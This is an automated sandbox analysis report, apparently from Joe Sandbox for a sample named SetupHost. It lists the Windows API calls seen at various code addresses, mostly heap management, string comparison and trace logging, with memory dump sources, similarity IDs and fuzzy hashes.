• GetLastError.KERNEL32(?,?,?,?,?,?,00552428,00000A4C,0051F080,?,?,00000000,00000000), ref: 004FF2C6
• CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00552428,00000A4C,0051F080), ref: 004FF31B
• CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00552428,00000A4C,0051F080), ref: 004FF344
• CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00552428,00000A4C,0051F080), ref: 004FF41E
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: memset$CompareString$ErrorLastNamePathVolume
• String ID:
• API String ID: 3838570357-0
• Opcode ID: 8d5bd78f64cec26978be99f53e4ff6bdbd87b1c88145653b80820581845491d0
• Instruction ID: 59842920a286848ffc735560db54b2c46dd57f22b54881ac4de9fe1c79d30c22
• Opcode Fuzzy Hash: 8d5bd78f64cec26978be99f53e4ff6bdbd87b1c88145653b80820581845491d0
• Instruction Fuzzy Hash: F1510675A0022D9BCF24DB14DD40BAEB774FF48720F1042E6EA19A26D0D7785E88CF48
APIs
• memset.MSVCRT ref: 0054E1BC
• GetTraceLoggerHandle.ADVAPI32(00000000), ref: 0054E1C9
• GetTraceEnableLevel.ADVAPI32(00000000), ref: 0054E1D9
• GetTraceEnableFlags.ADVAPI32(00000000), ref: 0054E1E5
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Trace$Enable$FlagsHandleLevelLoggermemset
• String ID:
• API String ID: 1282773000-0
• Opcode ID: 0fa65393bfaa1e643fe7fc848c40b162cdd935b08cffb34fa108cbacb15c8bf9
• Instruction ID: 39968acde253bd7c6ee9038b88c468517a2863d9a35cdac6650badf2b3fee8fa
• Opcode Fuzzy Hash: 0fa65393bfaa1e643fe7fc848c40b162cdd935b08cffb34fa108cbacb15c8bf9
• Instruction Fuzzy Hash: 7341AF366097419BC720CF29D895AA7BFF5FF89315F184A2CE8CA87691D770E804DB50
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00552AF8,00000020,005481A4), ref: 005480AB
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00552AF8,00000020,005481A4), ref: 005480B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617791916-0
                                                                                                                        • Opcode ID: 8d1c455a223eaa8c2805a163674a4c51b16a5db97b2eeafa129365d69a2cedbb
                                                                                                                        • Instruction ID: 69ecdf9a0ce6885fcf5dca9cfb70b5c4f9e27229f577e3b5b84dae9cf036e501
                                                                                                                        • Opcode Fuzzy Hash: 8d1c455a223eaa8c2805a163674a4c51b16a5db97b2eeafa129365d69a2cedbb
                                                                                                                        • Instruction Fuzzy Hash: B4215AB5D00219DFDB14CF99DC496EEBAB5FF48314F14412AE814B3290DA758945DFA0
                                                                                                                        APIs
                                                                                                                        • GetFileSizeEx.KERNEL32(?,?), ref: 0052C2DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileSize
                                                                                                                        • String ID: Incorrect filesize. Could be corrupted$VerifyFileByHandle
                                                                                                                        • API String ID: 3433856609-3984483981
                                                                                                                        • Opcode ID: fcd0b6fc731cf8d5bf31830431426548cec057dfedc0c140c6e55233c82a117b
                                                                                                                        • Instruction ID: 2ff5474bb525508333c6356419a41824735aedb42814173c0289dfebb19cb043
                                                                                                                        • Opcode Fuzzy Hash: fcd0b6fc731cf8d5bf31830431426548cec057dfedc0c140c6e55233c82a117b
                                                                                                                        • Instruction Fuzzy Hash: B5416D32204322AB8B21DE14E88496FBFA5BF9A760F148D1EF955972D1D730DA44CB92
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000028,?,?), ref: 0051724C
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00517253
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005172A4
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005172AB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 756756679-0
                                                                                                                        • Opcode ID: cf46412499a65d6f5cd288234655e48f08815a677e4100a79752f368cad69000
                                                                                                                        • Instruction ID: 4c4eec56fd00ae4c2994378ed53050cccfa8c5fd5412a3c6506b6f6bf41e77a1
                                                                                                                        • Opcode Fuzzy Hash: cf46412499a65d6f5cd288234655e48f08815a677e4100a79752f368cad69000
                                                                                                                        • Instruction Fuzzy Hash: FB415F74A0460ADFEB14CF58C494AAEBFF5FF4D300B148499E825DB250D730E985DB60
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000020,?,?,00000000,?,0050FC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 005100AE
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,0050FC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000,00000000), ref: 005100B5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,0050FC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000,00000000), ref: 00510113
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0050FC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0051011A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 756756679-0
                                                                                                                        • Opcode ID: f3fad137e3e5e7ca8b07d35c8bbc8268429dec1d74c6c71535a314fed615f056
                                                                                                                        • Instruction ID: a53a1920e7bfccd8e2b1f419f3144a3ed231519484ba1d1e79fde56d39a25b9b
                                                                                                                        • Opcode Fuzzy Hash: f3fad137e3e5e7ca8b07d35c8bbc8268429dec1d74c6c71535a314fed615f056
                                                                                                                        • Instruction Fuzzy Hash: F6211AB56047059FD7088F19D858A66BBE9FF9C311B158469E449CB3B1D770D980CBA0
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0052419C
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 005241A3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 005241D4
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 005241DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 83e02d233c75852b8db41e46797188f4a8a73aceb3e46228c7fcbfe8455dc6e2
                                                                                                                        • Instruction ID: cb0c1ccf0a990778a278df6065971638863ffb9620b60fc71b1caa69e20a88da
                                                                                                                        • Opcode Fuzzy Hash: 83e02d233c75852b8db41e46797188f4a8a73aceb3e46228c7fcbfe8455dc6e2
                                                                                                                        • Instruction Fuzzy Hash: 43118236A00309ABCB109F99EC88A5ABBB9FFA8301F144468E55997290C770DD54CF50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000008,00000820,?,00000000,?,?,?,?,?,?,?,?,?,?,00525463,?), ref: 0052C9B5
                                                                                                                          • Part of subcall function 0052C97F: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00525463,?), ref: 0052C9BC
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0052CAFE
                                                                                                                          • Part of subcall function 0052C97F: HeapFree.KERNEL32(00000000,?,00000000), ref: 0052CB05
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0052CB1B
                                                                                                                          • Part of subcall function 0052C97F: HeapFree.KERNEL32(00000000,?,00000000), ref: 0052CB22
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0052CB32
                                                                                                                          • Part of subcall function 0052C97F: HeapFree.KERNEL32(00000000,?,00000000), ref: 0052CB39
                                                                                                                          • Part of subcall function 0052C97F: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0052CB46
                                                                                                                          • Part of subcall function 0052C97F: HeapFree.KERNEL32(00000000,?,00000000), ref: 0052CB4D
                                                                                                                          • Part of subcall function 0052C97F: SetLastError.KERNEL32(00000000,?,00000000), ref: 0052CB54
                                                                                                                        • GetLastError.KERNEL32(?), ref: 00525467
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 0052547A
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00525481
                                                                                                                        • SetLastError.KERNEL32(00000000,?), ref: 00525491
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$ErrorLast$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 646459838-0
                                                                                                                        • Opcode ID: 63f48db1ac541d4647e8ff00a23f3aa5424ed1a7a02af7fbbe69f76e9b1a6c56
                                                                                                                        • Instruction ID: 47fb58a44d9856c84fffc979d0b93f47cdad7f419564413a5c11c8510dd4fa61
                                                                                                                        • Opcode Fuzzy Hash: 63f48db1ac541d4647e8ff00a23f3aa5424ed1a7a02af7fbbe69f76e9b1a6c56
                                                                                                                        • Instruction Fuzzy Hash: 45F06276D10328BBCB00EBF4A90D79EBBB8AF19753F118561E905E7080E6349A44DB90
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000018,00000000,00527299,?,00000000,?,005276BB,?,?,?,?), ref: 005283E1
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,005276BB,?,?,?,?), ref: 005283E8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00001144,?,00000000,?,005276BB,?,?,?,?), ref: 00528402
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,005276BB,?,?,?,?), ref: 00528409
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617791916-0
                                                                                                                        • Opcode ID: ec7b33fe44de31437b5f92a387ccbb5d66351966fe5cb7146f857150a3e37dc9
                                                                                                                        • Instruction ID: 715bd24a72af046a2b42f576d627519ab8f370f827680100c02de8517b641e8f
                                                                                                                        • Opcode Fuzzy Hash: ec7b33fe44de31437b5f92a387ccbb5d66351966fe5cb7146f857150a3e37dc9
                                                                                                                        • Instruction Fuzzy Hash: 26F0F6706457228BD7245FA5BC1C7A37DE1BF54716F04C518E1098A6D4DF7485089FD0
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0000436C,?,00000000,00527204), ref: 00528027
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00527204), ref: 0052802E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00528062
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00528069
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 756756679-0
APIs
• GetProcessHeap.KERNEL32(00000000,?,?,00000000,00527292,?,00000000,?,005276BB,?,?,?,?), ref: 005280DA
• HeapAlloc.KERNEL32(00000000,?,00000000,?,005276BB,?,?,?,?), ref: 005280E1
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,005276BB,?,?,?,?), ref: 00528113
• HeapFree.KERNEL32(00000000,?,00000000,?,005276BB,?,?,?,?), ref: 0052811A
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
APIs
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 005281C8
• HeapFree.KERNEL32(00000000), ref: 005281CF
• GetProcessHeap.KERNEL32(00000000,?), ref: 005281E0
• HeapFree.KERNEL32(00000000), ref: 005281E7
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,0054019C), ref: 005402E4
• HeapFree.KERNEL32(00000000), ref: 005402EB
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,0054019C), ref: 005402F4
• HeapFree.KERNEL32(00000000), ref: 005402FB
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0